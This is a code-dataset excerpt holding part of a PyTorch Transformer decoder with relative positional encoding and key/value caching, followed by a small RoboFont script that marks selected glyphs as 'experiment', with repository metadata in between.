        each has (batch, n_head, dim / n_head, cached_seq)
    r_position_embedding: relative positional embedding tensor (optional)
    r_content_bias / r_position_bias: relative-attention bias parameters (optional)

    Return
    ------------
    context_vector: tensor (batch, seq, dim)
    (key, value): `key` tensor (batch, head, dim/head, seq + cache_size) and
        `value` tensor (batch, head, seq + cache_size, dim/head)
    """
    query, key, value = self.query_key_value(x, cached_key_value)
    # causal attention distribution: (batch, head, seq, seq + cache)
    attention = self.masked_attention_weight(
        query, key, r_position_embedding, r_content_bias, r_position_bias)
    # weighted sum over values: (batch, head, seq, dim/head)
    attended = torch.matmul(attention, value)
    # move the head axis last -> (batch, seq, dim/head, head), then flatten heads
    attended = attended.permute(0, 2, 3, 1).contiguous()
    attended = attended.view(attended.size(0), attended.size(1), -1)
    # project merged heads back to the model dimension, then residual dropout
    attended = self.dropout_residual(self.linear_heads(attended))
    return attended, (key, value)
class TransformerBlock(nn.Module):
    """One pre-norm Transformer decoder block: masked self-attention followed
    by a position-wise feed-forward network, each with a residual connection."""

    def __init__(self,
                 n_embedding: int,
                 n_state_ffn: int,
                 n_head: int,
                 dropout_residual: float,
                 dropout_attention: float,
                 n_context: int,
                 n_positional_embedding: int=None):
        """Build one Transformer decoder block.

        Parameter
        ------------
        n_embedding: int
            embedding dimension
        n_state_ffn: int
            intermediate state dimension of the feed-forward sub-layer
        n_head: int
            number of attention heads
        dropout_residual: float
            dropout rate applied on the residual branch
        dropout_attention: float
            dropout rate applied on the attention weights
        n_context: int
            attention context length
        n_positional_embedding: int
            relative positional embedding dimension (disabled if None)
        """
        super().__init__()
        # NOTE: attribute names and creation order are kept stable so that
        # state_dict keys and parameter iteration order stay compatible.
        self.layer_norm_1 = nn.LayerNorm(n_embedding, eps=EPS_LAYER_NORM)
        self.layer_norm_2 = nn.LayerNorm(n_embedding, eps=EPS_LAYER_NORM)
        self.pointwise_ff = PointwiseFeedForward(n_embedding, n_state_ffn)
        self.self_attention = SelfMaskedAttention(n_embedding=n_embedding,
                                                 n_head=n_head,
                                                 dropout_attention=dropout_attention,
                                                 dropout_residual=dropout_residual,
                                                 n_context=n_context,
                                                 n_positional_embedding=n_positional_embedding)

    def forward(self,
                x,
                cached_key_value: list = None,
                r_position_embedding=None,
                r_content_bias=None,
                r_position_bias=None):
        """Apply the block to a (batch, seq, dim) input.

        Parameter
        ------------
        x: tensor (batch, seq, dim), where the last row x[:, seq, :] is the newest token
        cached_key_value: list of two tensors (batch, n_head, dim / n_head, cached_seq),
            [cached_key, cached_value]

        Return
        ------------
        x: tensor (batch, seq, dim)
        (k, v): `key` tensor (batch, head, dim/head, seq + cache_size) and
            `value` tensor (batch, head, seq + cache_size, dim/head)
        """
        # pre-norm attention sub-layer; also returns the updated key/value cache
        attended, key_value = self.self_attention(self.layer_norm_1(x),
                                                  cached_key_value=cached_key_value,
                                                  r_position_embedding=r_position_embedding,
                                                  r_content_bias=r_content_bias,
                                                  r_position_bias=r_position_bias)
        # feed-forward sub-layer operates on the normalized (x + attention) sum;
        # the outer residual adds back the raw input x
        return x + self.pointwise_ff(self.layer_norm_2(x + attended)), key_value
class TransformerDecoder(nn.Module):
    """ Transformer Decoder: a stack of TransformerBlock layers with input
    dropout, a final layer norm, and optional relative positional encoding
    (content/position bias parameters in the style of Transformer-XL). """

    def __init__(self,
                 n_layer: int,
                 n_embedding: int,
                 n_state_ffn: int,
                 n_head: int,
                 dropout_embedding: float,
                 dropout_residual: float,
                 dropout_attention: float,
                 n_context: int,
                 n_positional_embedding: int = None):
        """ Transformer Decoder

        Parameter
        ------------
        n_layer: int
            number of layer
        n_embedding: int
            embedding dimension
        n_state_ffn: int
            intermediate state dimension
        n_head: int
            number of attention head
        dropout_residual: float
        dropout_attention: float
        max_cache_size: int
            max cache size for key/value
        n_positional_embedding: int
            relative positional embedding dimension (no relative position encoding if None)
        """
        super().__init__()
        # one identically-configured block per layer
        self.transformer_stack = nn.ModuleList([
            TransformerBlock(n_embedding=n_embedding,
                             n_state_ffn=n_state_ffn,
                             n_head=n_head,
                             dropout_residual=dropout_residual,
                             dropout_attention=dropout_attention,
                             n_context=n_context,
                             n_positional_embedding=n_positional_embedding)
            for _ in range(n_layer)
        ])
        # dropout shared by token embeddings and positional embeddings
        self.input_dropout = nn.Dropout(dropout_embedding)
        self.layer_norm = nn.LayerNorm(n_embedding, eps=EPS_LAYER_NORM)
        # heads must divide the embedding evenly (per-head dim = n_embedding / n_head)
        assert n_embedding % n_head == 0
        if n_positional_embedding and n_positional_embedding != 0:
            # relative position encoding: sinusoidal-style embedding module plus
            # learned per-head content/position bias vectors (init to zero)
            self.pos_emb = PositionalEmbedding(n_positional_embedding)
            self.r_c_bias = nn.Parameter(torch.zeros((n_head, int(n_embedding / n_head))))
            self.r_p_bias = nn.Parameter(torch.zeros((n_head, int(n_embedding / n_head))))
        else:
            # disabled: forward then requires that no cache is passed in
            self.r_c_bias = self.r_p_bias = self.pos_emb = None
        self.n_layer = n_layer
        self.n_context = n_context

    def forward(self, x, cached_key_value: list=None, max_cache_length: int=None):
        """ transformer decoder output

        Parameter
        ------------
        x: tensor (batch, seq, dim), where the last row x[:, seq, :] is the newest token
        cached_key_value: cached key/value tensor
        max_cache_length: optional cap on how many cached positions each layer may attend to

        Return
        ------------
        x: tensor (batch, seq, dim)
        cached_key_value_new: new cached_key_value
        """
        # length of the cache carried over from previous calls (0 on the first call);
        # cached key tensors are (batch, n_head, dim/n_head, cached_seq), so size(-1)
        cached_length = cached_key_value[0][0].size(-1) if cached_key_value is not None else 0
        # never use more cache than actually exists
        max_cache_length = min(cached_length, max_cache_length) if max_cache_length else cached_length
        if self.pos_emb:
            # positions 0 .. n_context + cache - 1, on the input's device/dtype
            pos_seq = torch.arange(self.n_context + max_cache_length, device=x.device, dtype=x.dtype)
            pos_emb = self.pos_emb(pos_seq)  # (1, seq + cached - 1, dim)  -- NOTE(review): shape per original comment; verify against PositionalEmbedding
            pos_emb = self.input_dropout(pos_emb)
        else:
            # without relative positions the model cannot consume a cache
            assert cached_length == 0
            pos_emb = None
        if cached_length == 0:
            # first call: one empty cache slot per layer
            cached_key_value = [None] * self.n_layer
        assert len(cached_key_value) == self.n_layer
        x = self.input_dropout(x)
        cached_key_value_new = []
        for transformer_block, cached_kv in zip(self.transformer_stack, cached_key_value):
            # limit cached context length: keep only the most recent
            # max_cache_length positions, detached so no gradient flows
            # back through earlier segments
            if cached_kv is not None and max_cache_length < cached_length:
                k, v = cached_kv
                cached_kv = (k[:, :, :, -max_cache_length:].detach(), v[:, :, -max_cache_length:, :].detach())
            x, (k, v) = transformer_block(x,
                                          cached_key_value=cached_kv,
                                          r_position_embedding=pos_emb,
                                          r_content_bias=self.r_c_bias,
                                          r_position_bias=self.r_p_bias)
            # collect each layer's updated key/value for the next call
            cached_key_value_new.append((k, v))
        # final pre-output layer norm
        x = self.layer_norm(x)
        return x, cached_key_value_new
|
[
"spacefunkspacefunk@gmail.com"
] |
spacefunkspacefunk@gmail.com
|
59a531064d975b14af155d2f190f2f7872331b7a
|
05f5231a03e19b3bf72fa1caf939ea952aee36c4
|
/03--experiment.py
|
2552d26e9df07a803cbabfc4de8d812c63ed7516
|
[
"MIT"
] |
permissive
|
thundernixon/robofont-marx
|
673f426ccafb521d94bbc7d7e5adaa92d6c6fec3
|
ee8b6444c486b730f58f9b139f1143e3d04a35e6
|
refs/heads/master
| 2022-01-15T05:56:00.093046
| 2019-07-17T16:26:07
| 2019-07-17T16:26:07
| 195,687,796
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 318
|
py
|
# menuTitle : 03: Experiment - Purple
# shortCut : command+control+shift+3
# NOTE(review): the two header comments above look like RoboFont script
# metadata (menu label and keyboard shortcut) — keep them byte-identical.
"""
Mark currently-selected glyphs as "worked on,"
so it's clear they have been edited.
"""
from markLib.markGlyphs import markGlyphs
from markLib.settings import markSettings

# CurrentFont() is presumably the RoboFont built-in returning the active font — confirm
f = CurrentFont()
# apply the "experiment" mark color (from markLib settings) to the selected glyphs
markGlyphs(f, markSettings["experiment"])
|
[
"stephen@thundernixon.com"
] |
stephen@thundernixon.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.